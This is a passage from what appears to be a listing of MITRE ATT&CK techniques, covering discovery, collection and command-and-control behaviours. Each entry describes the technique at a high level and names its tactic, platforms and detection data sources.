Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre